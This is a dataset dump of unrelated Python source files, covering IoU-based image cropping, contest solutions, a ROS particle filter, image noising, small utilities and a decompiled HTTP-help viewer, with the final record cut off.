ID\t\tLABEL\n#\tfox\t\t\t\tn02119789\t\t0\n#\tbike\t\t\tn03792782\t\t1\n#\telephant\t\tn02504458\t\t2\n#\tcar\t\t\t\tn04037443\t\t3\n\n#################################################################################################\n# Function to compute IoU\n# Code lifted from here (THANKS!): \n#\thttp://www.pyimagesearch.com/2016/11/07/intersection-over-union-iou-for-object-detection/\n# Added check at beginning to determine if the boxes actually overlap\n# function takes in two variables, both of which are 1x4 arrays that look like this:\n# box[0] = topLeftX coordinate\n# box[1] = topLeftY coordinate\n# box[2] = bottomRightX coordinate\n# box[3] = bottomRightY coordinate\n#################################################################################################\ndef bb_intersection_over_union(boxA, boxB):\n\t# determine if the boxes don't overlap at all\n\tif (boxB[0] > boxA[2]) or (boxA[0] > boxB[2]) or (boxB[1] > boxA[3]) or (boxA[1] > boxB[3]):\n\t\treturn 0\n\n\t# determine the (x, y)-coordinates of the intersection rectangle\n\txA = max(boxA[0], boxB[0])\n\tyA = max(boxA[1], boxB[1])\n\txB = min(boxA[2], boxB[2])\n\tyB = min(boxA[3], boxB[3])\n \n\t# compute the area of intersection rectangle\n\tinterArea = (xB - xA + 1) * (yB - yA + 1)\n \n\t# compute the area of both the prediction and ground-truth rectangles\n\tboxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)\n\tboxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)\n \n\t# compute the intersection over union by taking the intersection\n\t# area and dividing it by the sum of prediction + ground-truth\n\t# areas - the interesection area\n\tiou = interArea / float(boxAArea + boxBArea - interArea)\n \n\t# return the intersection over union value\n\treturn iou\n\n\n#################################################################################################\n# This is how you would get a list of all files in a directory\n#################################################################################################\n\nlistcind=[\"/n02119789\",\"/n03792782\",\"/n02504458\",\"/n04037443\"]\nlistnames=[\"fox\",\"bike\",\"elephant\",\"car\"]\n\nfor clind in range(0,4):\n\timageDir = datasetDir + listcind[clind];\n\timageFiles = []\n\n\tfor (dirpath, dirnames, filenames) in walk(imageDir):\n\t\timageFiles.extend(filenames)\n\t\tbreak\n\n\t#print \"Printing list of image files\"\n\t#print imageFiles\n\t#print \"num Image Files in n02119789: \", len(imageFiles)\n\n\n\t#################################################################################################\n\t# This is how you would get the edge boxes for an image\n\t#\n\t# imageFileNames is a python list with absolute paths to images (the list can be of length 1)\n\t#\n\t# windows is a python list that looks like this:\n\t# \t\twindows[imageIdx][boxIdx][0] = topLeftY\n\t# \t\twindows[imageIdx][boxIdx][1] = topLeftX\n\t# \t\twindows[imageIdx][boxIdx][2] = bottomRightY\n\t# \t\twindows[imageIdx][boxIdx][3] = bottomRightX\n\t# \t\twindows[imageIdx][boxIdx][4] = quality of proposal (higher number = more likely to be an object)\n\t#\n\t# NOTE: imageIdx has N elements, where N is the number of images you passed into the function\n\t#\t\tN = 2 in the example below\t\n\t# NOTE: the size of boxIdx varies for each image. In other words, on image1, there might be 2318 \n\t#\t\tboxes...and on image2, there might be 809 boxes.\n\t# NOTE: When you are developing your code, I would recommend passing in a single image to the \n\t#\t\tfunction below. It took ~15 seconds on ecegrid to compute proposals on a single image and\n\t#\t\treturn the results.\n\t#\t\tAfter your code is working properly, and you are ready to run the algorithm on all the images\n\t#\t\tin the directory (ideally you have a nice loop setup to do this), I would recommend you tweak\n\t#\t\tyour code so you only call edge_boxes once (and pass in a list with paths to all the images).\n\t#\t\tWhy? Of the 15 seconds, something like 14.5 of them are \"waiting for Matlab to load\". Only\n\t#\t\t0.5 of them are doing work. If you have to loop over 400 images, waiting 14.5 seconds per image\n\t#\t\t(for Matlab to load) adds up to something like 100 minutes. If you call the edge_boxes function\n\t#\t\tonce (with paths to all 400 images), it only takes 3 minutes to run on ecegrid.\n\t# \t\tSO... again my advice: develop your code by passing in a single image (since waiting 15 seconds\n\t#\t\tis better than waiting 3 minutes). Then, when you're ready to run your code on the entire \n\t#\t\tdirectory of images, tweak your code to call edge_boxes once.\n\t# NOTE:\tWhen I had finished coding and was ready to run my code on the entire directory of images,\n\t#\t\tit took ~15 minutes from beginning to end. Each directory of images (4 total) took ~3 minutes\n\t#\t\tfor edge_boxes to run and ~1.5 minutes for the discovery, sorting, and saving of pos/neg images. \n\t#\t\tWhat can you do while you wait 15 minutes for your code to complete? Start working on phase2!\n\t#################################################################################################\n\timageFileNames = []\n\tfor fi in range(0,len(imageFiles)):\n\t\timageFileNames.append(imageDir + \"/\" + imageFiles[fi])\n\t\t\n\twindows = edge_boxes.get_windows(imageFileNames)\n\tpt=0;nt=0;\n\tt0=time.time()\n\tfor fi in range(0,len(imageFiles)):\n\t\tannotationFileName = datasetDir + \"/annotation\"+listcind[clind]+\"/\"+imageFiles[fi][:-5]+\".xml\"\n\n\t\t# load the annotation file into a data structure\n\t\ttree = ET.parse(annotationFileName)\n\t\tobjs = tree.findall('object') # \"object\" is the tag for an instance of the class. There can be multiple\n\t\t\t\t\t\t\t\t # \"object\" tags if there are multiple instances of the class in the image.\n\t\t#numObjs = len(objs) # this is how many ground truth instances there are \n\n\t\t# This is one way of looping over the instances and extracting their coordinates\n\t\tgroundTruthBox=[]\n\t\tfor ix, obj in enumerate(objs):\n\t\t\tbbox = obj.find('bndbox') # bndbox is a tag inside of \"object\". It has the ground truth coordinates\n\t\t\tgroundTruth_x1 = int(bbox.find('xmin').text)\n\t\t\tgroundTruth_y1 = int(bbox.find('ymin').text)\n\t\t\tgroundTruth_x2 = int(bbox.find('xmax').text)\n\t\t\tgroundTruth_y2 = int(bbox.find('ymax').text)\n\n\t\t\t# here I put the four coordinates into a \"box\" that I might pass into my bb_intersection_over_union function. (#useful!)\n\t\t\tgroundTruthBox.append([groundTruth_x1, groundTruth_y1, groundTruth_x2, groundTruth_y2])\n\t\t \n\t\tpcnt=0;ncnt=0;\n\t\tprpfig=windows[fi]\n\t\tfor bi in range(0,len(windows[fi])):\n\t\t\n\t\t\tprop=[prpfig[bi][1], prpfig[bi][0], prpfig[bi][3], prpfig[bi][2]]\n\t\t\t#################################################################################################\n\t\t\t# This is how you get the annotations for an image\n\t\t\t# It would behoove you to go look at one of the XML files so you know what they look like.\n\t\t\t# The code below will make more sense if you do.\n\t\t\t#################################################################################################\n\t\t\tmaxiou=0;\n\t\t\tfor itera in range(0,len(groundTruthBox)):\n\t\t\t\tiou = bb_intersection_over_union(groundTruthBox[itera], prop)\n\t\t\t\tif(iou>maxiou):\n\t\t\t\t\tmaxiou=iou\n\t\t\tif (maxiou>0.7 and pcnt<5):\n\t\t\t\t#True proposal\n\t\t\t\tpcnt=pcnt+1\n\t\t\t\tpt=pt+1\n\t\t\t\timg=cv2.imread(imageFileNames[fi])\n\t\t\t\tcrop_img=img[int(prop[1]):int(prop[3]), int(prop[0]):int(prop[2])]\n\t\t\t\t#crop_img=img[int(windows[fi][bi][0]):int(windows[fi][bi][2]), int(windows[fi][bi][1]):int(windows[fi][bi][3])]\n\t\t\t\tstring=\"images/\"+listnames[clind]+\"/pos/image_\"+str(pt+10000)[1:]+\".jpeg\"\n\t\t\t\tcv2.imwrite(string, crop_img)\n\t\t\telif (maxiou<0.4 and ncnt<5):\n\t\t\t\t#False proposal\n\t\t\t\tncnt=ncnt+1\n\t\t\t\tnt=nt+1\n\t\t\t\timg=cv2.imread(imageFileNames[fi])\n\t\t\t\tcrop_img=img[int(prop[1]):int(prop[3]), int(prop[0]):int(prop[2])]\n\t\t\t\t#crop_img=img[int(windows[fi][bi][0]):int(windows[fi][bi][2]), int(windows[fi][bi][1]):int(windows[fi][bi][3])]\n\t\t\t\tstring=\"images/\"+listnames[clind]+\"/neg/image_\"+str(nt+10000)[1:]+\".jpeg\"\n\t\t\t\tcv2.imwrite(string, crop_img)\n\t\t\telif (pcnt==5 and ncnt==5):\n\t\t\t\tbreak\n\n\tt1=time.time()\n\n\tprint(t1-t0)\n\t\n\n\n#################################################################################################\n# This is how you would check if a directory exists...and if it doesn't, create it\n#################################################################################################\n#if not os.path.exists(\"images\"):\n#\tos.makedirs(\"images\")\n\n\n#################################################################################################\n# Here we put a lot of the pieces together to load an image and display a bounding box around\n# the instance of the class.\n#################################################################################################\n\n# load the image\n\n#image = cv2.imread(datasetDir + \"/n02119789/n02119789_14086.JPEG\")\n\n# load the annotations\n#tree = ET.parse(datasetDir + \"/annotation/n02119789/n02119789_14086.xml\")\n#objs = tree.findall('object')\n\n# This is one way of looping over the instances and extracting their coordinates\n#for ix, obj in enumerate(objs):\n#\tbbox = obj.find('bndbox') # bndbox is a tag inside of \"object\". It has the ground truth coordinates\n#\tx1 = int(bbox.find('xmin').text)\n#\ty1 = int(bbox.find('ymin').text)\n#\tx2 = int(bbox.find('xmax').text)\n#\ty2 = int(bbox.find('ymax').text)\n\t\n\t# draw bounding boxes on the image\n#\tcv2.rectangle(image, (x1, y1), (x2, y2), (0, 255, 0), 1)\n\n#cv2.imshow('Cute foxes', image)\n#print \"Wasn't this a cute demo?\"\n#print \"Press the space bar to close the image of the foxes.\"\n#cv2.waitKey(0)\n\n","sub_path":"hw3/hw3-phase1.py","file_name":"hw3-phase1.py","file_ext":"py","file_size_in_byte":10793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"436940575","text":"from __future__ import print_function\nfrom itertools import product\nimport sys\nsys.modules[\"hashlib\"] = sys.sha512 = sys\nfrom random import shuffle\ninput = raw_input\n\ndef solve():\n lol1 = [0, 1, 2, 3]\n lol2 = list('0123456789')\n n = int(input())\n ls = [input() for _ in range(n)]\n blah = 123123123123\n halb = None\n for _ in range(100):\n shuffle(lol1)\n shuffle(lol2)\n c = 0\n s = set()\n res = []\n for elt in ls:\n if elt not in s:\n s.add(elt)\n res.append(elt)\n continue\n c += 1\n worked = False\n lol = product(lol1, lol2)\n for i, char in lol:\n temp = ''.join([elt[j] if j != i else char for j in range(4)])\n if temp not in s:\n s.add(temp)\n res.append(temp)\n worked = True\n break\n assert worked\n if c < blah:\n blah = c\n halb = res\n print(c)\n for asdf in halb:\n print(asdf)\n\n\nt = int(input())\nfor _ in range(t):\n solve()\n","sub_path":"codeforces/1263/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"500333709","text":"import networkx as nx\nfrom networkx.algorithms import bipartite\n\ndef verifier(nodes, edges, choice):\n g = nx.Graph()\n g.add_nodes_from(nodes);\n g.add_edges_from(edges);\n is_bip = nx.is_bipartite(g)\n if choice in \"true\":\n choice = True\n else:\n choice = False\n if not(is_bip ^ choice):\n print('Risposta esatta')\n else:\n print('Risposta errata')","sub_path":"exercise_1/verifier/bip_v.py","file_name":"bip_v.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"71678826","text":"\"\"\"\nInput {'key1': 'value1', 'key2': [1, 2, 3], 'key3': (1, 2, 3)} Output True\nInput [{'key1': 'value1', 'key2': [1, 2, 3], 'key3': (1, 2, 3)} Output False\n\"\"\"\n\n\ndef validate_format(chars: str) -> bool:\n lookup = {'{': '}', '[': ']', '(': ')'}\n stack = []\n for char in chars:\n # if c in lookup.keys():\n if char in lookup:\n stack.append(lookup[char])\n if char in lookup.values():\n if not stack:\n return False\n if char != stack.pop():\n return False\n if stack:\n return False\n return True\n\n\nif __name__ == '__main__':\n import json\n d = {'key1': 'value1', 'key2': [1, 2, 3], 'key3': (1, 2, 3)}\n s = json.dumps(d)\n print(s)\n print(validate_format(s))\n s += '('\n print(s)\n print(validate_format(s))\n","sub_path":"algo_sample/29_stack_quiz_json/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459711379","text":"#!/usr/bin/env python \nimport sys\nimport os\nimport math\nimport rospy\nimport numpy as np\nimport tf\nimport tf2_ros\nimport tf_conversions\n\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom nav_msgs.msg import Odometry\n\n#import geometry_msgs.msg\n#import fiducial_msgs.msg\n#from fiducial_msgs.msg import FiducialTransformArray, FiducialArray\n#from geometry_msgs.msg import Pose, PoseWithCovariance, TransformStamped, PoseStamped \n#from tf.transformations import quaternion_from_euler, euler_from_quaternion\n\n\nclass ArucoParticleFilterRemote():\n\n def __init__(self):\n ## Pull necessary ROS parameters from launch file:\n\n # Read pose observation topic (pose estimated from aruco detection) \n param = rospy.search_param(\"pose_observation_topic\")\n self.pose_obs_top = rospy.get_param(param)\n # Read prediction update topic (EKF filtered odometry from IMU and ctrl inputs) \n param = rospy.search_param(\"prediction_update_topic\")\n self.pred_up_top = rospy.get_param(param)\n # Read particle filter estimate topic (output of this node)) \n param = rospy.search_param(\"particle_filtered_pose_topic\")\n self.pf_pose_top = rospy.get_param(param)\n # Read particle count \n param = rospy.search_param(\"particle_count\")\n self.pc = rospy.get_param(param)\n \n # Read covariance values \n param = rospy.search_param(\"initial_estimate_covariance\")\n self.init_cov = rospy.get_param(param)\n param = rospy.search_param(\"linear_process_covariance\")\n self.pl_cov = rospy.get_param(param)\n param = rospy.search_param(\"angular_process_covariance\")\n self.pa_cov = rospy.get_param(param)\n param = rospy.search_param(\"linear_observation_covariance\")\n self.ol_cov = rospy.get_param(param)\n param = rospy.search_param(\"angular_observation_covariance\")\n self.oa_cov = rospy.get_param(param)\n\n\n # Initialize callback variables\n self.obs_pose = None\n self.pred_odom = None\n\n # Initialize class variables\n self.time = None\n self.old_time = None\n self.old_theta = 0\n self.ang_z_obs = 0\n self.obs_pose_old = None\n self.innov = np.zeros((self.pc,3))\n self.likeli = np.zeros((self.pc,1))\n\n # Establish subscription to observation pose\n rospy.Subscriber(self.pose_obs_top, PoseWithCovarianceStamped, self.obs_pose_callback)\n # Establish subscription to prediction update odometry\n rospy.Subscriber(self.pred_up_top, Odometry, self.pred_up_callback)\n # Delay briefly to allow subscribers to find messages\n rospy.sleep(0.5)\n\n # Build the process and observation covariance matrices\n self.cov_matrices_build()\n\n # Initialize array of particle states | # particles x 4 [x, y, theta_z, weight]\n self.particles = (np.random.rand(self.pc,4)-0.5)*(2*self.init_cov)\n # Initialize angles on range [-pi, pi]\n #self.particles[:,2] = (np.random.rand(self.pc,)-0.5)*(2*np.pi)\n # Initialize all angles to 0 | works better for non-global localization\n self.particles[:,2] = np.zeros((self.pc,))\n # Set all particle weights equal\n self.particles[:,3] = np.ones((self.pc,))\n\n # Initialize publisher for estimated pose of vehicle in map frame\n self.posepub = rospy.Publisher(self.pf_pose_top, PoseWithCovarianceStamped, queue_size=10)\n self.pub = PoseWithCovarianceStamped()\n\n\n ##### Primary particle filter functions #####\n\n # Function to call all functions and run particle filter\n def run_pf(self):\n while not rospy.is_shutdown(): \n # Only predict when a filtered odometry (IMU and ctrl) comes in\n if self.pred_odom != None and np.absolute(self.pred_odom.twist.twist.linear.x) > 0.01:\n # Track prediction message timestamp\n self.time = self.pred_odom.header.stamp.secs + self.pred_odom.header.stamp.nsecs*10**-9\n if self.old_time and self.time > self.old_time:\n self.predict()\n # Update previous timestamp for comparison to next\n self.old_time = self.time\n\n # Only update observation when an aruco-based pose measurement comes in\n if self.obs_pose != None and self.obs_pose != self.obs_pose_old:\n self.obs_update()\n self.weight()\n self.mult_resample() # Option to use multinomial resampling\n #self.sys_resample() # Option to use systematic resampling\n self.obs_pose_old = self.obs_pose\n \n self.particle_publish()\n \n # Function for process/prediction step \n def predict(self):\n # Use covariance to calculate gaussian noise for prediction\n pnoise = self.gaussian_noise(self.pcov_matrix)\n \n # Unpack odometry message\n xvel = self.pred_odom.twist.twist.linear.x\n yvel = self.pred_odom.twist.twist.linear.y\n quat = (self.pred_odom.pose.pose.orientation.x, self.pred_odom.pose.pose.orientation.y,\n self.pred_odom.pose.pose.orientation.z, self.pred_odom.pose.pose.orientation.w)\n _, _, theta = tf.transformations.euler_from_quaternion(quat)\n omega = self.pred_odom.twist.twist.angular.z\n \n # Calculate timestep from last prediction update\n dt = self.time - self.old_time\n \n # Update particle pose estimates based on angular and linear velocities from odometry \n self.particles[:,0] = self.particles[:,0] + pnoise[:,0] + xvel*dt*np.cos(self.particles[:,2]) \n self.particles[:,1] = self.particles[:,1] + pnoise[:,1] + xvel*dt*np.sin(self.particles[:,2]) \n self.particles[:,2] = self.particles[:,2] + pnoise[:,2] + (theta - self.old_theta)\n # self.particles[:,2] = self.particles[:,2] + pnoise[:,2] + omega*dt # Alternative angle calculation\n # Force angles to be on range [-pi, pi]\n self.particles[:,2] = np.remainder(self.particles[:,2]+np.pi,2*np.pi)-np.pi\n # Update old theta for comparison\n self.old_theta = theta\n\n # Function for observation update\n def obs_update(self):\n # Unpack observation pose estimates\n x_obs = self.obs_pose.pose.pose.position.x\n y_obs = self.obs_pose.pose.pose.position.y\n quat = (self.obs_pose.pose.pose.orientation.x, self.obs_pose.pose.pose.orientation.y,\n self.obs_pose.pose.pose.orientation.z, self.obs_pose.pose.pose.orientation.w)\n _, _, self.ang_z_obs = tf.transformations.euler_from_quaternion(quat)\n\n # Calculate Innovation (difference from measurement to particle pose)\n self.innov[:,0] = x_obs - self.particles[:,0]\n self.innov[:,1] = y_obs - self.particles[:,1]\n self.innov[:,2] = self.ang_z_obs - self.particles[:,2]\n # Force angles to be on range [-pi, pi]\n self.innov[:,2] = np.remainder(self.innov[:,2]+np.pi,2*np.pi)-np.pi \n\n # Calculate likelihood\n self.likeli = np.exp(-0.5*np.sum(np.square(self.innov).dot(np.linalg.inv(self.ocov_matrix)), axis=1))\n #*(1/(2*np.pi*np.sqrt(np.linalg.det(self.ocov_matrix)))) # Constant not needed\n \n print(sum(self.likeli))\n # Function to reassign weights to particles\n def weight(self):\n self.particles[:,3] = self.likeli#/sum(self.likeli) #reweight occurs in resample functions\n\n # Function to resample particles | Systematic Resampling\n def mult_resample(self):\n # Define cumulative density function\n cdf = np.cumsum(self.particles[:,3])\n cdf /= cdf[cdf.size-1]\n\n # Temporarily store old particle poses and set new to zero\n temp = self.particles[:,[0,1,2]]\n self.particles = np.zeros((self.pc,4))\n # Systematic Resampling\n r = np.random.rand(self.pc,1)\n for i in range(cdf.size):\n ind = np.argmax(cdf >= r[i])\n self.particles[i,[0,1,2]] = temp[ind,:]\n\n # Reassign even weight of 1 to all new particles\n self.particles[:,3] = np.ones((self.pc,))\n\n\n # Function to resample particles | Systematic Resampling\n def sys_resample(self):\n # Define cumulative density function\n cdf = np.cumsum(self.particles[:,3])\n cdf /= cdf[cdf.size-1]\n\n # Temporarily store old particle poses and set new to zero\n temp = self.particles[:,[0,1,2]]\n self.particles = np.zeros((self.pc,4))\n # Systematic Resampling\n r = np.random.rand(1)/self.pc\n for i in range(cdf.size):\n ind = np.argmax(cdf >= (r + (i-1)/self.pc))\n self.particles[i,[0,1,2]] = temp[ind,:]\n # Reassign even weight of 1 to all new particles\n self.particles[:,3] = np.ones((self.pc,))\n #print(self.particles)\n\n\n ##### Support Functions #####\n\n # Function to publish average of particle poses\n def particle_publish(self):\n self.pub.pose.pose.position.x = np.average(self.particles[:,0])\n self.pub.pose.pose.position.y = np.average(self.particles[:,1])\n self.pub.pose.pose.orientation.z = np.average(self.particles[:,2]) \n # Theta needs to be converted to quaternion to be useful for anything other than plotting!\n \n self.posepub.publish(self.pub) \n\n # Function to build 3x3 process and observation covariance matrices\n def cov_matrices_build(self):\n # Build process covariance matrix\n self.pcov_matrix = np.array([[self.pl_cov, 0.0, 0.0],\n [0.0, self.pl_cov, 0.0],\n [0.0, 0.0, self.pa_cov]])\n # Build observation covariance matrix\n self.ocov_matrix = np.array([[self.ol_cov, 0.0, 0.0],\n [0.0, self.ol_cov, 0.0],\n [0.0, 0.0, self.oa_cov]])\n\n # Function to assign gaussian noise from diagonalcovariance matrix\n def gaussian_noise(self, cov_mat):\n var = np.diagonal(cov_mat)\n noise = np.sqrt(var)*np.random.randn(self.pc, 3)\n return noise\n\n # Callback function for observation pose subscription (from aruco_detect)\n def obs_pose_callback(self, obs_pose_msg):\n self.obs_pose = obs_pose_msg\n\n # Callback function for prediction odometry subscription (from EKF)\n def pred_up_callback(self, pred_up_msg):\n self.pred_odom = pred_up_msg\n\nif __name__ == '__main__':\n # Initialize ROS node\n rospy.init_node('particle_filter_aruco_remote', anonymous=True)\n rospy.loginfo(\"Successful initilization of node\")\n \n # Create particle filter class\n pf = ArucoParticleFilterRemote()\n rospy.loginfo(\"ArucoParticleFilterRemote class successfully created\")\n \n # Run particle filter\n pf.run_pf()","sub_path":"python_nodes/particle_filter_aruco_remote.py","file_name":"particle_filter_aruco_remote.py","file_ext":"py","file_size_in_byte":10847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"224868979","text":"import glob as gb\nfrom PIL import Image\n\nfrom pylab import *\n\nfrom numpy import *\nimport ipdb\nimport random\n#产生数据\n#读取图像,转化为灰度图,并添加 均值为0,方差为25的高斯噪声,保存图像\nimg_path = gb.glob(\"/home/bobo/data/VOCdevkit/Pascal VOC2007/VOCdevkit/VOC2007/JPEGImages/*.jpg\")\n\nii = 0;\nfor path in img_path:\n # 只拿15000张照片 其实只有5000张照片\n\n if (ii < 15000):\n # 读取图像,转化为灰度图\n im = array(Image.open(path).convert('L'))\n # 设定高斯函数的偏移\n means = 0\n # 设定高斯函数的标准差\n sigma = 25\n im_flatten = im[:, :].flatten()\n # 计算新的像素值\n for i in range(im.shape[0] * im.shape[1]):\n pr = int(im_flatten[i]) + random.gauss(0, sigma)\n #小于0置为0\n if (pr < 0):\n pr = 0\n # 大于255,置为255\n if (pr > 255):\n pr = 255\n im_flatten[i] = pr\n im[:, :] = im_flatten.reshape([im.shape[0], im.shape[1]])\n # 保存灰度图\n from scipy import misc\n # 拿到照片名字\n imgs_name = path.split('.')[-2].split('/')[-1]\n # 保存图像\n misc.imsave(\n '/home/bobo/data/VOCdevkit/Pascal VOC2007/VOCdevkit/VOC2007/JPEGImages_Noise_added_grayscale/' + imgs_name + '.jpg',\n im)\n\n# 读取该JPEGImages_Noise_added_grayscale目录下所有的jpg文件\nimg_path2 = gb.glob(\"/home/bobo/data/VOCdevkit/Pascal VOC2007/VOCdevkit/VOC2007/JPEGImages_Noise_added_grayscale/*.jpg\")\nprint(img_path2.__len__())","sub_path":"ImageDenoising_pytorch/data/porductData.py","file_name":"porductData.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"475312334","text":"import os\nimport shutil\n\nfor f in os.listdir('.'):\n if f.endswith('.pdf') == False:\n continue\n\n d = f[0]\n\n if not os.path.exists(d):\n os.mkdir(d)\n\n shutil.move(f, os.path.join(d, f))\n\n","sub_path":"mv_separate.py","file_name":"mv_separate.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"18752236","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nclass Tools:\n\t\"\"\"\n\t**Tool**\n\tTools class, tools needed in most of the code all the same\n\t\"\"\"\n\n\tdef unicode_safe(self,word):\n\t\t\"\"\"unicode safe code (https://code.djangoproject.com/ticket/170)\"\"\"\n\t\tif type(word) == unicode:\n\t\t\tword = word.encode('utf-8')\n\t\treturn word\n\t\n\t#calculate median for an array of number\n\tdef calc_median(self,number_list):\n\t\tvalues = sorted(number_list)\n\t\tif(len(values)%2==1):\n\t\t\t#odd number of elements\n\t\t\treturn values[((len(values)+1)/2)-1]\n\t\telse:\n\t\t\t#even number\n\t\t\tlower = values[(len(values)/2)-1]\n\t\t\tupper = values[(len(values)/2)]\n\t\t\treturn (float(lower+upper))/2\n\t\n\t#calculate the average\n\tdef calc_average(self,sum_of,count):\n\t\t#no divide / 0\n\t\taverage = 0\n\t\tif((count)!= 0):\n\t\t\taverage = float(sum_of)/count\n\t\treturn average\n\n\t#calculate the some of an array numbers\n\tdef calc_sum(self,array_of_numbers):\n\t\tsum_of = 0\n\t\tfor i in array_of_numbers:\n\t\t\tsum_of = sum_of + i\n\t\treturn sum_of\n\n","sub_path":"drama/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"353936597","text":"from sellmo import modules\nfrom sellmo.api.decorators import link\n\nfrom django.shortcuts import render\n\n\nnamespace = modules.product.namespace\n\n\n@link()\ndef product(request, product, context, **kwargs): \n context.update({\n 'product': product\n })\n return render(request, 'product/product.html', context) ","sub_path":"skeleton/product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"264739100","text":"import logging\nfrom ibmsecurity.utilities import tools\n\nlogger = logging.getLogger(__name__)\n\n\ndef run(isamAppliance, application_interface, statistics_duration, check_mode=False, force=False):\n \"\"\"\n Retrieving the Application Interface Statistics\n \"\"\"\n return isamAppliance.invoke_get(\"Run pdadmin command\",\n \"/analysis/interface_statistics.json{0}\".format(\n tools.create_query_string(prefix=application_interface,\ntimespan=statistics_duration)))\n","sub_path":"ibmsecurity/isam/pdadmin.py","file_name":"pdadmin.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169782131","text":"import sys\nimport os\nimport Xlib.rdb\nimport traceback\nfrom events.event_dispatcher import EventDispatcher\nfrom util.log_utils import log_error\n\ndisplay, appname, resource_database, args = Xlib.rdb.get_display_opts(Xlib.rdb.stdopts)\n\nclass NoUnmanagedScreens(Exception):\n pass\n\nclass Plexi:\n def __init__(self, display):\n self.display = display\n if display:\n os.environ['DISPLAY'] = display.get_display_name()\n\n self.event_dispatcher = EventDispatcher(display)\n\n if len(self.event_dispatcher.screens) == 0:\n raise NoUnmanagedScreens()\n\n self.display.set_error_handler(self.x_error_handler)\n\n\n def x_error_handler(self, err, request):\n log_error('X protocol error: {0}'.format(err))\n\n\nwm = Plexi(display)\n","sub_path":"plexi.py","file_name":"plexi.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"589487812","text":"class Solution(object):\n def isInterleave(self, s1, s2, s3):\n \"\"\"\n :type s1: str\n :type s2: str\n :type s3: str\n :rtype: bool\n \"\"\"\n if s1 == None or s2 == None or s3 == None or len(s3)!=len(s1) + len(s2):\n return False\n m = len(s1)\n n = len(s2)\n # dp[n+1][m+1]\n dp = [[False for i in range(n+1)] for j in range(m+1)]\n # dp = [[False] * (m+1)] * (n+1) \n dp[0][0] = True\n for i in range(1,m+1):\n dp[i][0] = s1[i-1] == s3[i-1] and dp[i-1][0]\n \n for j in range(1, n+1):\n dp[0][j] = (s2[j-1] == s3[j-1]) and dp[0][j-1]\n \n for i in range(1,m+1):\n for j in range(1,n+1):\n dp[i][j] = (dp[i-1][j] & (s1[i-1] == s3[i+j-1])) |(dp[i][j-1] & (s2[j-1] == s3[i+j-1]))\n \n return dp[m][n]\n \n","sub_path":"97-Interleaving-String/InterleavingString.py","file_name":"InterleavingString.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"443568053","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\httphelp\\content_generator.py\n# Compiled at: 2018-11-27 06:45:48\n# Size of source mod 2**32: 2131 bytes\nimport sys, yaml, urwid\nfrom httphelp.constants import CURR_DIR\nfrom httphelp.app_handler import Scrollable\n\ndef __load_file_data(num):\n copyleft = yaml.safe_load(open('/'.join([CURR_DIR, 'copyright_description.yml']), 'r'))\n if num:\n return copyleft['statuscode']\n return copyleft['headers']\n\n\ndef generate_content(status_code):\n try:\n code_descriptions, num, status_code = get_yaml_dictionary(status_code)\n content = code_descriptions[status_code]\n pile = urwid.Pile([\n urwid.Text('HTTPHELP: The Manual for HTTP Status Codes and Headers\\n', align='center'),\n urwid.Text(('title', 'STATUS MESSAGE' if num else 'HEADER INFO')),\n urwid.Padding((urwid.Text(''.join([str(status_code), ': ' if num else ', Example= ', content['message'], '\\n']))),\n left=5),\n urwid.Text(('title', 'CATEGORY')),\n urwid.Padding((urwid.Text(''.join([content['category'], '\\n']))), left=5),\n urwid.Text(('title', 'DESCRIPTION')),\n urwid.Padding((urwid.Text(''.join([content['description'], '\\n']))), left=5),\n urwid.Text(('title', 'COPYRIGHT')),\n urwid.Padding((urwid.Text(''.join([__load_file_data(num), '\\n']))), left=5)])\n padding = urwid.Padding((Scrollable(pile)), left=1, right=1)\n return padding\n except KeyError:\n return\n\n\ndef get_yaml_dictionary(status_code):\n try:\n status_code = int(status_code)\n num = True\n filename = 'code_descriptions.yml'\n except (TypeError, ValueError):\n num = False\n filename = 'header_descriptions.yml'\n\n try:\n code_descriptions = yaml.safe_load(open('/'.join([CURR_DIR, filename]), 'r'))\n except yaml.constructor.ConstructorError:\n print('Invalid file. Only support valid json and yaml files.')\n sys.exit(1)\n\n return (code_descriptions, num, status_code)","sub_path":"pycfiles/httphelp-1.1.1.post1-py3.7/content_generator.cpython-37.py","file_name":"content_generator.cpython-37.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"260593449","text":"#!/usr/bin/env python\n#coding:utf-8\n\"\"\"\n 